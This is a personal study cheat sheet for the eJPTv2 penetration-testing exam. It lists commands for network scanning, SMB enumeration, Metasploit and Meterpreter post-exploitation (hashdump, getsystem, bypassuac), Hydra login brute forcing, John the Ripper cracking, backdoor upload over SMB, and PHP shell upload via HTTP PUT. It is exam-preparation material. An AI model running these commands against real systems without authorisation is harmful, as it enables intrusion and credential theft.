eJPTv2 Cheat Sheet

Disclaimer

This is merely a suggestion based on the tools I personally found useful during the test. I encourage you to take your own notes and tailor your preparation to best suit your needs for the exam

For additional details about the Exam, please refer to my exam Review post:

  • Nmap
  • Dirbuster
  • nikto
  • WPSCan
  • CrackMapExec
  • The Metasploit Framework
  • SearchSploit
  • Hydra

1. Assessment Methodologies


Ping Sweep

fping -a -g 10.10.10.0/24 2>/dev/null
nmap -sn 10.10.10.0/24

Simple Bash ping sweep:

#!/bin/bash
###ping_sweep.sh
###---------------------------------------------------------------
### Objective: Ping all hosts in the network
-----------------------------------------------------

if [ "$1" == "" ]
then
	echo "PING SWEEP"
	echo "Use mode : $0 REDE"
	echo "Example: $0 192.168.0"
else
	for host in {1..254};
	do
		ping -c 1 $1.$host | grep "64 bytes" | cut -d ":" -f 1 | cut -d " " -f 4;
	done
fi

Nmap - Scans

nmap -sS -A 10.10.10.10 
nmap -script vuln -p(open ports from the first scan)
OS Detection: nmap -Pn -O 10.10.10.10
Quick Scan: nmap -sC -sV 10.10.10.10
Full Scan: nmap -sC -sV -p- 10.10.10.10
UDP Quick Scan: nmap -sU -sV 10.10.10.10

SMB Enumeration


enum4linux

enum4linux -a <ip>      # Enumerating using enum4linux tool

smbclient

smbclient -L //IP -N    # Checking for available shares
smbclient //<target IP>/IPC$ -N     # Connecting to a share

smbmap

smbmap -u guest -p "" -d . -H <TARGET_IP>

smbmap -u <USER> -p '<PW>' -d . -H <TARGET_IP>

## Run a command
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -x 'ipconfig'
## List all drives
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -L
## List dir content
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> -r 'C$'
## Upload a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --upload '/root/sample_backdoor' 'C$\sample_backdoor'
## Download a file
smbmap -u <USER> -p '<PW>' -H <TARGET_IP> --download 'C$\flag.txt'

Metasploit

# METASPLOIT SMB
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/pipe_auditor

2. Host & Network Auditing


Checking Routes

ip route    # Checking defined routes in linux
route       # Checking defined routes in linux
route print     # Checking defined routes in windows

Adding Manual Routes

ip route add <subnet> via <gateway or router address>

Finding Mac Addresses

ipconfig /all       # windows
ifconfig        # *nix OSs
ip addr     # linux

Checking ARP Cache

arp -a      # Windows
arp     # *nix OSs
ip neighbour        # Linux

Checking for Listening Ports On a Host

#Windows
netstat -ano      
Get-NetTCPConnection | where {$_.State -eq 'Listen'} 

#Linux
netstat -tunp      
lsof -i -P -n | grep LISTEN
ss -tuln 

3. Host & Network Penetration Testing


Use the information from the 1 and 2 phases to find a vulnerable threat vector.

Below are some helpful Vulnerability assessment resources:

  • Searchsploit
  • ExploitDB
  • Msfconsole search command
  • Google
  • Nessus

Reverse Shell

Excelente online Reverse Shell Generator

Online - Reverse Shell Generator

Enconde-Decode

CyberChef

Metasploit Basic Commands

search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)

Meterpreter

#Autoroute
meterpreter> run autoroute -s <subnet>
meterpreter > run autoroute -p      # show active route table

#Basic Commands

background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump

Hydra

hydra -U ftp        # hydra uses module for each service to attack. To get information about a module this command can be used
hydra -L users.txt -P pass.txt <service://server> <options>
hydra -l admin -P pass.txt -f ftp://10.10.10.10        # Stop attacking on finding first successful hit for user admin
hydra  -L users.txt -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:Incorrect credentials" -f -V    # Attacking http post form

John-The-Ripper

john --list=formats
john -incremental -users:<users list> <file to crack>       # if you want to crack only certain users from the password database such as /etc/shadow file
john --show crackme     # Check cracked password after completion of cracking session, where crackme is the password database file
john -wordlist=<wordlist> <file to crack>
john -wordlist=<wordlist> -rules <file to crack>        # rules are used for cracking mangling words such as for cat mangling words could be c@t,caT,CAT,CaT

4. Web Application Penetration Testing

Information Gathering

wappanalyzer
whatweb
nikto -h
whatweb <HOST>
whois <HOST>
whois <IP>
dnsrecon -d <HOST>
**nc -v 10.10.10.10 port**
**HEAD / HTTP/1.0**

OpenSSL for HTTPS services

**openssl s_client -connect 10.10.10.10:443**, **HEAD / HTTP/1.0**

Httprint

**httprint -P0 -h 10.10.10.10 -s /path/to/signaturefile.txt**

HTTP Verbs

GET, POST, HEAD, PUT, DELETE, OPTIONS

Use the OPTIONS to check if other verbs are available:

nc 10.10.10.10 80
OPTIONS / HTPP/1.0

To upload a PHP shell, HTTP verbs can be utilized. First, determine the content length, then employ the PUT method for uploading the shell. It’s essential to include the payload size in the PUT command.

wc -m shell.php
x shell.php

PUT /shell.php
Content-type: text/html
Content-length: y

Directory and File Scanning

**dirsearch.py -u http://10.10.10.10 -e ***
**gobuster -u 10.10.10.10 -w /path/to/wordlist.txt
ffuf** -w **/path/to/wordlist.txt**:FUZZ -u http://www.evil.com/FUZZ
dirb http://<IP>/
**dirbyster&**